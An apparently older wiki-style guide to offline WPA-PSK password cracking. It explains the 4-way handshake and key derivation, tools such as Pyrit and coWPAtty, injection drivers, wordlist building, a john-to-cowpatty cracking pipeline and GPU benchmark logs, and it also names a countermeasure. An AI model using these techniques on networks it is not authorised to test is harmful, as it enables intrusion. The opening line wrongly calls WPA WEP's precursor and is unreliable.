WPA Attack
WPA is the precursor to WEP to fill a need for a secure replacement after the fully disclosed and flawed WEP encryption.
Background
Most wireless networks operating today use WPA and a Pre-Shared Key (PSK) between parties, i.e. a common password between the Access Point and Client Station, for protection. While the 802.11i standard, of which WPA is implemented on, is still intact the authentication is prone to a offline brute-force attack.
4-Way handshake
When a client want to connect to a access point, the following simplified stages will take place:
- Client will take the Password and ESSID of the network to compute a Pairwise Master Key and send a request to the AP asking to connect
- AP will responds with a random ANonce number
- Client create a random SNonce number, take the Pairwise Master Key, ANonce, SNonce, and AP and client MAC address to compute a Pairwise Transient Key
- Client will sign the SNonce number using the Pairwise Transient Key and send it unencrypted to the AP
- AP receives the signed SNonce, and compute the Pairwise Master Key from its Password and ESSID. Use the Pairwise Master Key, ANounce, SNounce, and AP and client MAC address to compute a Pairwise Transient Key
- By signing the SNonce message with the new Pairwise Transient Key, the AP can match the Integrity Code of the SNonce message sent from the client.
- If it's the same, the AP can then assume the client used the same Pairwise Master Key (Password+ESSID) to generate the Pairwise Transient Key, subsequently used to sign the message
- AP sends an acknowledgment to the client signed with the Pairwise Transient Key and includes information for further communication
For an excellent explanation, see the Airolib-ng manual.
Key generation
The PMK is generated using the following relatively processor intensive function, pseudo code:
- PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)
Where the PBKDF2 method is from PKCS #5 v2.0: Password-based Cryptography Standard. This means that the concatenated string of the passphrase, SSID, and the SSIDlength is hashed 4096 times to generate a value of 256 bits. The lengths of the passphrase and the SSID have little impact on the speed of this operation [1].
And the other PTK hash is generated using this less processor intensive function, pseudo code:
- PTK = PRF-512(PMK, "Pairwise key expansion", Min(AP_Mac, Client_Mac) || Max(AP_Mac, Client_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce))
The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake. [2].
- MIC = HMAC_MD5(MIC Key, 16, 802.1x data)
A MIC value is calculated, using the MIC Key from the PTK and the EAPoL message.
Generating the PMK using the PBKDF2 function is slow and costly. It can be pre-computed for time-space-benefit. Both coWPAtty and Pyrit can create these hash-tables. Pyrit is especially fast as it's utilizing the GPGPU concept to speed up the process, see the Pyrit project page to see the difference.
Details:
- PSK as the Key Establishment Method
- WPA Passive Dictionary Attack Overview
- Wireless Security WPA discussion thread
- Computing the Temporal Keys
- Cracking Wi-Fi Protected Access (WPA), Part 2, Page 6
- The Many Paths of Wi-Fi Security
Attack
An offline attack on the functions above are possible by disassociating any connected client(s), capturing a full 4-way handshake session when the client(s) re-connect, and then extrapolate the AP MAC, Client MAC, the ANonce and SNonce. The SSID is already known.
Present with the above information it's possible to brute-force the passphrase by computing the 4-way handshake as mentioned above (calculate the PMK, PTK, and subsequently sign the SNonce to get the Integrity Code) with every possible passphrase+SSID combination. If the passphrase is correct the Integrity Code will match the captured Integrity Code.
See the coWPAtty and Pyrit source code for examples on the handshake process.
Counter-measures
As it's explained above and clear, a long and alpha-numeric password will thwart this dictionary attack. Use a something like kurtm.net WPA-PSK generator or preferably the Yubico USB key adapter to generate a truly random password.
Tools
- pyrit - blog - Reference manual - Code details
- Like coWPatty and Airolib-ng
- Pre-compute PMK keys
- Import compressed (.gz) files
- Supports stdin (i.e. John the Ripper piping)
- Internal database over precomputed ESSID and PMK combinations
- Export PMK to coWPAtty (*.cow ) and Airolib-ng (*.db) supported files
- GPGPU acceleration
- Strip out 4-way handshake from capture file
- coWPAtty - coWPAtty project page - Readme
- Like Pyrite and Airolib-ng
- WPA-PSK attack on specific ESSID and captured 4-way handshake dump
- Passthrough from Pyrite possible (GPGPU acceleration)
- Pre-computed PMK tables supported
- genpmk:
- Generate "Pairwise Master Key" table for a specific ESSID, PMK tables
- Table-file name should end with *.cow
- Airolib-nb
- Like coWPatty and Pyrit
- Precompute TMK keys and attack WPA/WPA2 handshake captures
- Internal SQLite3 database
- Can export and import coWPAtty files
Extra:
- Church of Wifi wpa-psk rainbow tables
- Pre-computed TMK key tables, 1 million words computed for the top 1000 SSID's
- 7 and 33 GB torrents
- Hak5 single tables downloads
Drivers
The Alfa AWUS036H adapter is a really good 500 mW USB device based on the RTL8187 chipset, but the drivers are/were buggy. Currently, as of September 2009, it seems that the Compat Wireless rtl8187/mac80211 framework drivers are the most stable and reliable for general use and the old r8187/ieee80211 drivers are most suitable for the Aircrack-ng suite and frame injection [3]. See the tutorial link below for details on how to switch between the drivers.
I can confirm that the latest rtl8187/mac80211 drivers are slow. Packet injection using same device in Backtrack 3 (BT3) was much faster than in Backtrack (BT4) pre-final. Unsure of the cause, but it seems that the latest drivers lack a speed patch used previously (see thread below). BT3 uses the r8187/ieee80211_rtl stack while BT4 uses the main kernel rtl8187/mac80211 stack with some patches already applied (the BT4 Beta, not Pre-final, had some rtl8187/mac80211 speed improvements applied).
Summary to install the BT4 r8187/ieee80211 (r8187-drivers) driver package:
aptitude search r8187 -- and look for the kernel version the driver was compiled for, and install it: aptitude install linux-image-2.6.30.5 linux-source-2.6.30.5 dpkg --force-overwrite -i /var/cache/apt/archives/linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb # if it reports firmware files already exists reboot # to load new kernel sudo rmmod rtl8187 sudo rmmod mac80211 echo "blacklist rtl8187" | sudo tee -a /etc/modprobe.d/blacklist echo "blacklist r8187" | sudo tee -a /etc/modprobe.d/blacklist echo "blacklist rt2870sta" | sudo tee -a /etc/modprobe.d/blacklist echo "blacklist mac80211" | sudo tee -a /etc/modprobe.d/blacklist aptitude install r8187-drivers modprobe r8187
- TUTORIAL: Installing drivers RTL8187, r8187, RT2800usb on UBUNTU
- tl8187 injection speed patches on linux-2.6.29
- Mac80211 to ieee80211
Word lists
List of word lists
These are compiled word lists and readily available.
- Church of Wifi wordlists - passwords2 (2.1 MB) and 9-final-wordlist (11 MB)
- Outpost9.com (direct) - dic-0294 (8.04 MB) (reference)
- Openwall wordlists - Multiple languages, small fee [4]
- The Argon various wordlists - There are WPA versions of these lists, see Xploitz below
- Xploitz Master Password Collection
- Huegel's Cracking Dictionary Compilation - Cleaned-up version of Xploitz list
Generating word lists
By following simple guidelines a good word-list can be generated. Consider the following [5]:
- Most people use easy to remember passwords, in this case it has to be 8 characters or over in length
- Append 0-9 to the word, i.e. (word)1, (word)2, (word)3, ..
- Sequence of numbers are often used, e.g. 123, 321, 999, ..
- First letter is often upper-case
- Short words (under 8 characters) are stringed in series of two, e.g. googlegoogle, hellohello, openopen, ..
- Forename and surname often used
John The Ripper and Raptor 3 are great utilities to create all the permutations mentioned above. JTP can pipe the data to avoid having to save the new stream. JTR has an extended rules engine to build the permutations.
john -wordfile:dictfile -rules -session:johnrestore.dat -stdout:63 | \ cowpatty -r eap-test.dump -f - -s somethingclever [6]
Tools
GPU acceleration
CUDA (Compute Unified Device Architecture) is a parallel computing architecture developed by nVidia [7]. Competitively, FireStream / Fire Processor is a stream processor developed by ATI Technologies. Both are based on the GPGPU (General Purpose Graphics Processing Units) concept for heavy floating-point computations [8]. Instead of having four or eight threads crunching on a parallelized task in the CPU, you could have 64, 320, or how many stream processors (Unified Shaders) tackling the same work in the GPU [9].
Traditionally the GPU has been very limited, only accelerating part of the graphics pipeline. Utilizing the GPU to perform floating-point computations is an order of magnitudes faster than on a modern CPU. It possible to achieve over a teraflop of theoretical computing capacity using relatively inexpensive commodity hardware.
As a side-note, SLI can not be used, only individual processor units.
- List of CUDA enabled nVidia video cards
- List of AMD/ATI Stream processor line-up
- nitteo's gigant F@H GPU2 FARM
- Manifold nVidia CUDA review
- Tom's Hardware: Look at Nvidia CUDA
Practical attak
Handy commands
Connect to OPEN network:
ifconfig wlan0 down iwconfig wlan0 mode managed iwconfig wlan0 essid SMC dhclient wlan0 -d
Connect to WEP protected network:
ifconfig wlan0 down iwconfig wlan0 mode managed iwconfig wlan0 enc (40/104bit key) iwconfig wlan0 essid SMC dhclient wlan0 -d
Performance measurements
SuperMicro Tesla GPU server
After a few queries I was fortunately enough to get access to a SuperMicro Dual Tesla C1060 GPU rack server. I could lend it for 10 days to perform benchmarking and general testing of the hardware. Special thanks to Geir over at Nextron for the generosity!
- SuperMicro Tesla GPU Server running Pyrit - Video tour of setup
Server configuration: SuperServer 6016GT-TF-TM2, 2x Tesla C1060 cards, Xeon X5560 quad-core 2.8 GHz, 12 GB RAM, WD VelociRaptor 300 GB, 1000W PSU, and 16x screeching FANs. Perfect to build a cluster. The quality of this thing is outstanding, as is the price.
root@bt:~/pyrit# hdparm -tT /dev/sda /dev/sda: Timing cached reads: 15464 MB in 2.00 seconds = 7740.52 MB/sec Timing buffered disk reads: 368 MB in 3.01 seconds = 122.19 MB/sec root@bt:/mnt/pyr/pyrit# ls -lh files/*cow|wc -l 1000 root@bt:/mnt/pyr/pyrit# du -hs files/ 39G files/ root@bt:/mnt/pyr/pyrit# cat passwords.txt|wc -l 996358 root@bt:/mnt/pyr/pyrit# cat essid_list.txt|wc -l 1000 root@bt:/mnt/pyr/pyrit# lspci|grep -i Tesla 02:00.0 3D controller: nVidia Corporation GT200 [Tesla C1060 / Tesla S1070] (rev a1) 03:00.0 3D controller: nVidia Corporation GT200 [Tesla C1060 / Tesla S1070] (rev a1) root@bt:/mnt/pyr/pyrit# cat /proc/cpuinfo|grep Xeon model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz root@bt:/mnt/pyr/pyrit# pyrit|grep Lukas Pyrit 0.2.3 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com root@bt:/mnt/pyr/pyrit# uname -r 2.6.30.5
Power usage, peak:
236V, 2.51A, 50Hz, (equals ~575-592Watt during load)
Now for the more interesting part. Pyrit was the first GPU accelerated WPA-PSK key generation utility. It supports both Nvidia CUDA and ATI Stream Processor cores, in addition to regular CPUs. The test below is a synthetic benchmark and a real batch run.
root@bt:~/pyrit# pyrit benchmark Pyrit 0.2.3 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3 Running benchmark for at least 60 seconds... #1: 'CUDA-Device #1 'Tesla C1060': 12146.7 PMKs/s (Occ. 95.2%; RTT 2.6) #2: 'CUDA-Device #2 'Tesla C1060': 12155.2 PMKs/s (Occ. 95.8%; RTT 2.8) #3: 'CPU-Core (SSE2)': 632.6 PMKs/s (Occ. 98.6%; RTT 3.0) #4: 'CPU-Core (SSE2)': 637.1 PMKs/s (Occ. 94.1%; RTT 3.0) #5: 'CPU-Core (SSE2)': 636.8 PMKs/s (Occ. 93.9%; RTT 3.0) #6: 'CPU-Core (SSE2)': 637.3 PMKs/s (Occ. 98.2%; RTT 3.0) #7: 'CPU-Core (SSE2)': 643.8 PMKs/s (Occ. 93.5%; RTT 3.0) #8: 'CPU-Core (SSE2)': 642.0 PMKs/s (Occ. 93.1%; RTT 3.0) Benchmark done. 28131 PMKs/s total.
In regular batch mode the PMKs/second is a little lower.
root@bt:/mnt/pyr/pyrit# pyrit -f "default.cow" -e "default" batch Pyrit 0.2.3 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3 The ESSID-blobspace seems to be empty; you should create an ESSID... Working on ESSID 'default' Computed 769976 PMKs so far; 25940 PMKs per second; 133785 passwords buffered. Stopped reading workunits... Computed 991934 PMKs so far; 26131 PMKs per second; 0 passwords buffered.ed... All done. 26229.04 PMKs/s total. #1: 'CUDA-Device #1 'Tesla C1060': 11889.1 PMKs/s (Occ. 98.1%; RTT 2.3) #2: 'CUDA-Device #2 'Tesla C1060': 11851.0 PMKs/s (Occ. 92.9%; RTT 2.2) #3: 'CPU-Core (SSE2)': 624.1 PMKs/s (Occ. 92.9%; RTT 2.5) #4: 'CPU-Core (SSE2)': 642.2 PMKs/s (Occ. 99.5%; RTT 2.5) #5: 'CPU-Core (SSE2)': 632.6 PMKs/s (Occ. 92.8%; RTT 2.5) #6: 'CPU-Core (SSE2)': 635.6 PMKs/s (Occ. 93.8%; RTT 2.5) #7: 'CPU-Core (SSE2)': 607.0 PMKs/s (Occ. 94.7%; RTT 2.6) #8: 'CPU-Core (SSE2)': 631.3 PMKs/s (Occ. 93.3%; RTT 2.5) Batchprocessing done.
I decided to do an extended test run to see how it would compare to other other systems. More specifically the pre-computed Church of Wifi WPA-PSK tables. The team computed the set on using coWPAtty on 15 card FPGA setup. It was at that time completed in 3 days and 9000 PMK/s. This was before the GPU accelerated clients were available.
For the test below I used the same 1 million word password list and 1000 ESSID access point names. The test was done in terminal without X Window running.
The loop script completed after 650 minutes (10 hours and 50 minutes)! Size of the resulting set was 39GB, exactly the size of the Church of Wifi set.
This is the script I used to run the test. To get the execution timing details, use time before the script, i.e. time ./start.sh. Also, make sure there aren't any DOS/Windows return characters, remove them using the dos2unix command.
#!/bin/bash pyrit_prefs="/home/ivc/.pyrit" echo -e "Cleaning .pyrit directory..." rm -frI $pyrit_prefs/blobspace/ dos2unix passwords.txt pyrit -i passwords.txt import_passwords dos2unix essids.txt lines=`cat essids.txt|wc -l` for (( i = 1; i <= $lines; i++ )) do essid=`tail -$i essids.txt|head -1` if [ -n "$essid" ]; then echo -e "Run #$i - ESSID: $essid - Now processing...\n" pyrit -o "$essid.cow" -e "$essid" batch echo -e "Done - Exported to $essid.cow. Cleaning essid blobspace...\n\n" rm -fr $pyrit_prefs/blobspace/essid/ fi done
Check the Pyrit setup guide for a installation reference.
References
- Cracking WPA FAST with video cards - Forum post
- Remote-Exploit forums - Great community and resource
- Benefits of Time-Memory Trade-Off in coWPAtty
- Creating custom password lists from webpages
- pyrit CUDA nvidia Tutorial and Nvidia overclock instructions - PDF version
- BT4 (pre)final ATI guide
- WPA cracking with AMD Stream and a Radeon HD4870 by Znuh
- nitteo's gigant F@H GPU2 FARM
- Cracking Wi-Fi Protected Access (WPA), Part 2 - excellent article